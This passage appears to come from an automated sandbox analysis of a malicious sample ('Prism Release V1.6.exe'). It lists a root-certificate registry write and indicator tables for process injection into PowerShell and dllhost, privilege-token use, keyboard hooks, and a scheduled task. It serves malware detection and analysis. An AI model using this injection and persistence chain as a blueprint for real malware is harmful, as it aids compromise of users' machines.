Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

dllhost.exe

pid process

2860 dllhost.exe

pid	process
2860	dllhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exetaskmgr.exesvchost.exepowershell.exe

pid	process
1876	powershell.exe
4216	powershell.exe
4216	powershell.exe
1876	powershell.exe
2448	powershell.exe
2448	powershell.exe
2920	powershell.exe
2920	powershell.exe
4312	powershell.exe
4312	powershell.exe
3628	powershell.exe
3628	powershell.exe
4968	chrome.exe
4968	chrome.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4008	svchost.exe
4008	svchost.exe
4292	taskmgr.exe
4256	powershell.exe
4256	powershell.exe
4256	powershell.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

4292 taskmgr.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

664

pid	process
4292	taskmgr.exe

pid	process
664

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

Processes:

chrome.exechrome.exe

pid	process
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

dllhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	2860	dllhost.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	2860	dllhost.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe
Token: SeShutdownPrivilege	4968	chrome.exe
Token: SeCreatePagefilePrivilege	4968	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4968	chrome.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe
4292	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

nexusloader.exe

pid process

2152 nexusloader.exe
2152 nexusloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Prism Release V1.6.exePrism.exedllhost.exechrome.exe

description	pid	process	target process
PID 400 wrote to memory of 4216	400	Prism Release V1.6.exe	powershell.exe
PID 400 wrote to memory of 4216	400	Prism Release V1.6.exe	powershell.exe
PID 400 wrote to memory of 4216	400	Prism Release V1.6.exe	powershell.exe
PID 400 wrote to memory of 1876	400	Prism Release V1.6.exe	powershell.exe
PID 400 wrote to memory of 1876	400	Prism Release V1.6.exe	powershell.exe
PID 400 wrote to memory of 1876	400	Prism Release V1.6.exe	powershell.exe
PID 400 wrote to memory of 5052	400	Prism Release V1.6.exe	Prism.exe
PID 400 wrote to memory of 5052	400	Prism Release V1.6.exe	Prism.exe
PID 400 wrote to memory of 2860	400	Prism Release V1.6.exe	dllhost.exe
PID 400 wrote to memory of 2860	400	Prism Release V1.6.exe	dllhost.exe
PID 5052 wrote to memory of 2152	5052	Prism.exe	nexusloader.exe
PID 5052 wrote to memory of 2152	5052	Prism.exe	nexusloader.exe
PID 2860 wrote to memory of 2448	2860	dllhost.exe	powershell.exe
PID 2860 wrote to memory of 2448	2860	dllhost.exe	powershell.exe
PID 2860 wrote to memory of 2920	2860	dllhost.exe	powershell.exe
PID 2860 wrote to memory of 2920	2860	dllhost.exe	powershell.exe
PID 2860 wrote to memory of 4312	2860	dllhost.exe	powershell.exe
PID 2860 wrote to memory of 4312	2860	dllhost.exe	powershell.exe
PID 2860 wrote to memory of 3628	2860	dllhost.exe	powershell.exe
PID 2860 wrote to memory of 3628	2860	dllhost.exe	powershell.exe
PID 2860 wrote to memory of 2240	2860	dllhost.exe	schtasks.exe
PID 2860 wrote to memory of 2240	2860	dllhost.exe	schtasks.exe
PID 4968 wrote to memory of 4748	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4748	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
